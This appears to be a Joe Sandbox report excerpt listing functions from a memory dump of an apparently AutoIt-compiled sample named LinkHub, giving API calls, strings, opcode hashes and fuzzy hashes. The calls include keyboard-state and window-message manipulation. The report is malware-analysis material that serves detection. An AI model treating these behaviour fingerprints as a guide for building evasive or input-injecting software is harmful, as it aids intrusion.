Null Object assignment in FOR..IN loop, xrefs: 00E55035, 00E55163, 00E5521B
Incorrect Object type in FOR..IN loop, xrefs: 00E55189

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 60373a820ef33d33a263eac528ba2122ac6d9c1f8a1d3b676b26d7c40f8ecb8e
Instruction ID: 7100d3121452a1da35d398a996825a64eef09e3689a541ad971aa80290c09f94
Opcode Fuzzy Hash: 60373a820ef33d33a263eac528ba2122ac6d9c1f8a1d3b676b26d7c40f8ecb8e
Instruction Fuzzy Hash: F5919F72A00A15ABCF20CFA5CC54FAFBBB8EF45315F109959F905BB290D7709949CBA0

Function 00E41B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00E41C1B
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E41C43
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00E41C67
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E41C97
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E41D1E
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E41D83
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E41DEF

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 39e121933d2df19b2f269414472424f70a5408bf5c1e37fc6d556cd21058008a
Instruction ID: e7e707203421011ceed07466443b323715cd375455f1b6d17db5019b411dbb6b
Opcode Fuzzy Hash: 39e121933d2df19b2f269414472424f70a5408bf5c1e37fc6d556cd21058008a
Instruction Fuzzy Hash: E591FFB5A00218AFDF049F95E8C4BBEB7B4FF44715F1190A9E950FB291D774A980CB60

Function 00E543A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E543C8
CharUpperBuffW.USER32(?,?), ref: 00E544D7
_wcslen.LIBCMT ref: 00E544E7
VariantClear.OLEAUT32(?), ref: 00E5467C

Part of subcall function 00E4169E: VariantInit.OLEAUT32(00000000), ref: 00E416DE
Part of subcall function 00E4169E: VariantCopy.OLEAUT32(?,?), ref: 00E416E7
Part of subcall function 00E4169E: VariantClear.OLEAUT32(?), ref: 00E416F3

Strings

AUTOIT.ERROR, xrefs: 00E544DD, 00E544E2
Incorrect Parameter format, xrefs: 00E54403, 00E545FE

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 0062a1f5fdba1e45e9bebc58f3ce31ea6f1e436fad4d070382bc0e413b340e78
Instruction ID: 405fb41e4b40981dbc36a1de408b1506dcdf0f95f7b1757829bf3de3f56db63c
Opcode Fuzzy Hash: 0062a1f5fdba1e45e9bebc58f3ce31ea6f1e436fad4d070382bc0e413b340e78
Instruction Fuzzy Hash: 73917EB56083019FC700DF24C48096AB7E5FF89719F14991EF89AA7391DB31ED49CB62

Function 00E5560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00E308FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E30831,80070057,?,?,?,00E30C4E), ref: 00E3091B
Part of subcall function 00E308FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E30831,80070057,?,?), ref: 00E30936
Part of subcall function 00E308FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E30831,80070057,?,?), ref: 00E30944
Part of subcall function 00E308FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E30831,80070057,?), ref: 00E30954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00E556AE
_wcslen.LIBCMT ref: 00E557B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00E5582C
CoTaskMemFree.OLE32(?), ref: 00E55837

Strings

NULL Pointer assignment, xrefs: 00E55880, 00E558AF

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: bf12b878dc1276a9c9e79e6c0129ca33b81ce676d69f588e153aca930c4b251e
Instruction ID: 1b6933bac737c4b3df1f518ec07a3d6059aaec9a73f221ff53935d6dcf3371cf
Opcode Fuzzy Hash: bf12b878dc1276a9c9e79e6c0129ca33b81ce676d69f588e153aca930c4b251e
Instruction Fuzzy Hash: A8910372D00219EBDF14DFA4DC91AEEBBB9EF08314F10456AE915B7251DB709A48CFA0

Function 00E62B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00E62C1F
GetMenuItemCount.USER32(00000000), ref: 00E62C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E62C79
_wcslen.LIBCMT ref: 00E62CAF
GetMenuItemID.USER32(?,?), ref: 00E62CE9
GetSubMenu.USER32(?,?), ref: 00E62CF7

Part of subcall function 00E34393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E343AD
Part of subcall function 00E34393: GetCurrentThreadId.KERNEL32 ref: 00E343B4
Part of subcall function 00E34393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E32F00), ref: 00E343BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E62D7F

Part of subcall function 00E3F292: Sleep.KERNEL32 ref: 00E3F30A

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 8f30790ff6277b8a48ed11e3b0fd482fb7622a05eb5cee53b901ed8ffe2142ee
Instruction ID: 48c6c599da6802cb8ec424102d2eb19b5f5fdeb6af32035726c19a99f310751f
Opcode Fuzzy Hash: 8f30790ff6277b8a48ed11e3b0fd482fb7622a05eb5cee53b901ed8ffe2142ee
Instruction Fuzzy Hash: 1C71A975E00604AFCB10EF65D844AAEBBF1EF48354F109869E916FB351DB30AE418BA0

Function 00E3B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00E3B8C0
GetKeyboardState.USER32(?), ref: 00E3B8D5
SetKeyboardState.USER32(?), ref: 00E3B936
PostMessageW.USER32(?,00000101,00000010,?), ref: 00E3B964
PostMessageW.USER32(?,00000101,00000011,?), ref: 00E3B983
PostMessageW.USER32(?,00000101,00000012,?), ref: 00E3B9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E3B9E7

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f14985ef372cbf100b867da6e638720b60d9a7e96f64193a55d65cfabff294f5
Instruction ID: 9e285acbd738baf87e31f19b6ba509e9108384df0534db56101bde4da9591715
Opcode Fuzzy Hash: f14985ef372cbf100b867da6e638720b60d9a7e96f64193a55d65cfabff294f5
Instruction Fuzzy Hash: 9B5106A0A087D53DFB364234CC4DBBABEA95F45308F089489E3D6658D2C3D89CC4D750

Function 00E3B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00E3B6E0
GetKeyboardState.USER32(?), ref: 00E3B6F5
SetKeyboardState.USER32(?), ref: 00E3B756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E3B782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E3B79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E3B7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E3B7FF

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: e94439afc1af605860618fd5fe35eac8521dae1156cab5a0170dfaa7cc15be53
Instruction ID: e0131252da00573b26e25b4786db926f04dfe240470bdbc01a79ce70941cff65
Opcode Fuzzy Hash: e94439afc1af605860618fd5fe35eac8521dae1156cab5a0170dfaa7cc15be53
Instruction Fuzzy Hash: 885118A09087D53DFB364334CC1AB76BED89B45308F0C558AE2D66A8D2D3D4ED84D750

Function 00E057A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00E05F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00E057E3
__fassign.LIBCMT ref: 00E0585E
__fassign.LIBCMT ref: 00E05879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00E0589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,00E05F16,00000000,?,?,?,?,?,?,?,?,?,00E05F16,?), ref: 00E058BE
WriteFile.KERNEL32(?,?,00000001,00E05F16,00000000,?,?,?,?,?,?,?,?,?,00E05F16,?), ref: 00E058F7

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 8428c3f3edc3f2b5e5ab6118629df2c8fda71d3c601faaf6ff280ad338d027f2
Instruction ID: f1136d96a8501d51e733d1bb47fe08269d561fddea020039e8a02a81837a4200
Opcode Fuzzy Hash: 8428c3f3edc3f2b5e5ab6118629df2c8fda71d3c601faaf6ff280ad338d027f2
Instruction Fuzzy Hash: E351AF71A046499FCB10CFA8D881AEEBBF8EF49310F14515AE951F7291D770A981CF60

Function 00DF3090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00DF30BB
___except_validate_context_record.LIBVCRUNTIME ref: 00DF30C3
_ValidateLocalCookies.LIBCMT ref: 00DF3151
__IsNonwritableInCurrentImage.LIBCMT ref: 00DF317C
_ValidateLocalCookies.LIBCMT ref: 00DF31D1

Strings

csm, xrefs: 00DF3166

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9a9a69d74ef13a1896790d5df1423ab5a615fbfb8ee8cac06da9da02c5900a6f
Instruction ID: aa60b18bf86121958b259ed57ae1b7f94c829d245e61063110f0171a101f7ea6
Opcode Fuzzy Hash: 9a9a69d74ef13a1896790d5df1423ab5a615fbfb8ee8cac06da9da02c5900a6f
Instruction Fuzzy Hash: C7418F34A0031C9BCF10DF68C885AAEBBA5EF45314F1BC156EA196B292D731DB15CBB1

Function 00E3D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E3D7CD,?), ref: 00E3E714

Part of subcall function 00E3E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E3D7CD,?), ref: 00E3E72D

lstrcmpiW.KERNEL32(?,?), ref: 00E3D7F0
MoveFileW.KERNEL32(?,?), ref: 00E3D82A
_wcslen.LIBCMT ref: 00E3D8B0
_wcslen.LIBCMT ref: 00E3D8C6
SHFileOperationW.SHELL32(?), ref: 00E3D90C

Strings

\*.*, xrefs: 00E3D89E

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: b511cafc934bb579a7de478fdac812772424eb8dffc18c09437b12dce4e6c4ef
Instruction ID: fca5e0fd3bc64c9ffbd4bed23d37faee5e6676b64b19d5900fc54078a43f5c96
Opcode Fuzzy Hash: b511cafc934bb579a7de478fdac812772424eb8dffc18c09437b12dce4e6c4ef
Instruction Fuzzy Hash: 604142719092189EDF16EBA4DD85BDE77B8AF08380F1110EAE605FB141EA74B789CB50

Function 00E442B9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00E44310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00E44367
TranslateMessage.USER32(?), ref: 00E44390
DispatchMessageW.USER32(?), ref: 00E4439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E443AB

Strings

(, xrefs: 00E4437D

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID: (
API String ID: 2256411358-2063206799
Opcode ID: 66d05f267943c3051352338f2c9b6382a4ef598241b4ddc59d52287b771e576a
Instruction ID: ef092cb9e3471acc954ee4c9cff80e9ecfca8bb0ccaa8570cf5cb6d7fd521d9a
Opcode Fuzzy Hash: 66d05f267943c3051352338f2c9b6382a4ef598241b4ddc59d52287b771e576a
Instruction Fuzzy Hash: EE31B8B0B04242DEEB258F39FC48BB777E8AB06708F04556DD562B25E0D7A4A84DCB11

Function 00E63899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00E638B8
GetWindowLongW.USER32(?,000000F0), ref: 00E638EB
GetWindowLongW.USER32(?,000000F0), ref: 00E63920
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00E63952
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00E6397C
GetWindowLongW.USER32(?,000000F0), ref: 00E6398D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E639A7

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 4a909d8fb56aa367d993d4d520250d667d7b71a51dab6598dca98f0d86802ef2
Instruction ID: 169a90181787c75733f45a4e084301fc6a9de9d6f9111e7fb22f1fbc28975162
Opcode Fuzzy Hash: 4a909d8fb56aa367d993d4d520250d667d7b71a51dab6598dca98f0d86802ef2
Instruction Fuzzy Hash: 43313A347842519FDB25CF69EC84F6537E0FB8A794F142168F901AB2B5C7B0A948CF41

Function 00E3808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E380D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E380F6
SysAllocString.OLEAUT32(00000000), ref: 00E380F9
SysAllocString.OLEAUT32(?), ref: 00E38117
SysFreeString.OLEAUT32(?), ref: 00E38120
StringFromGUID2.OLE32(?,?,00000028), ref: 00E38145
SysAllocString.OLEAUT32(?), ref: 00E38153

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: c42ca3b2f39008575b64124ad5cd1d72db8c3d4d1c876491852c2b8b21710d7b
Instruction ID: bceb7d2226b925234d72e93516bf40efe1a99617c8f711c9a639bff305263461
Opcode Fuzzy Hash: c42ca3b2f39008575b64124ad5cd1d72db8c3d4d1c876491852c2b8b21710d7b
Instruction Fuzzy Hash: 80218372605219AF9F10DFA9DC88CBB77ACEB09364B448425FA15EB290DAB0DD46C760

Function 00E38164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E381A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E381CF
SysAllocString.OLEAUT32(00000000), ref: 00E381D2
SysAllocString.OLEAUT32 ref: 00E381F3
SysFreeString.OLEAUT32 ref: 00E381FC
StringFromGUID2.OLE32(?,?,00000028), ref: 00E38216
SysAllocString.OLEAUT32(?), ref: 00E38224

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a702f3156a47eee5ea8637fedca4d9730ed87cf1e28d9be9912f835909e180c9
Instruction ID: c1a58bce53c38d1d5e899fb17f77a57858176c5449bccd51770b11bb023d1ce0
Opcode Fuzzy Hash: a702f3156a47eee5ea8637fedca4d9730ed87cf1e28d9be9912f835909e180c9
Instruction Fuzzy Hash: 0D21A471604204BFDB149BA9EC88DAB7BECEB09364B408125F915EB1A0DEB0ED41C764

Function 00E40E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00E40E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E40ED5

Strings

nul, xrefs: 00E40F0E

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: b6c86473ab24c806b49944c41ab9037e602fdd5dbc3591dc854b2c1037ab840b
Instruction ID: 0af70b7d1507ae8be6e4a4e4f6575481ae06a9558e14f381a0268ae2b7886738
Opcode Fuzzy Hash: b6c86473ab24c806b49944c41ab9037e602fdd5dbc3591dc854b2c1037ab840b
Instruction Fuzzy Hash: 1B215170604309AFDB308F26EC04A9A77A8AF54764F204A39FDA5F72D0D7709854CB50

Function 00E40F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00E40F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E40FA8

Strings

nul, xrefs: 00E40FE0

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
